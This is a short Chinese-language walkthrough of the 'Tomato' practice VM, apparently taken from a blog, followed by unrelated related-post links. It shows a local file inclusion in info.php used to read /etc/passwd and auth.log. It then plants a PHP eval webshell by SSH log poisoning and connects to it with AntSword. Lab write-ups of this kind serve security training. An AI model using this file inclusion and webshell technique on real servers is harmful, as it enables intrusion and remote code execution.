Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
li星野13 分钟前
Linux应用:进程的回收
linux
20242817李臻16 分钟前
课上测试:MIRACL共享库使用测试
linux·数据库
不能只会打代码22 分钟前
六十天前端强化训练之第十七天React Hooks 入门:useState 深度解析
前端·javascript·react.js
电鱼智能的电小鱼28 分钟前
SAIL-RK3576核心板应用方案——无人机视觉定位与地面无人设备通信控制方案
linux·嵌入式硬件·无人机·边缘计算
PagiHi37 分钟前
iWebOffice2015 中间件如何在Chrome107及之后的高版本中加载
前端·javascript·chrome·中间件·edge·js
曾富贵1 小时前
【eslint 插件】导入语句排序
前端·eslint
NaZiMeKiY1 小时前
HTML5前端第八章节
前端·html·html5
远之喵1 小时前
js基础知识-考点
前端
如此风景1 小时前
TS装饰器
前端
鱼樱前端1 小时前
React完整学习指南:从入门到精通(从根class->本hooks)16-19完整对比
前端·react.js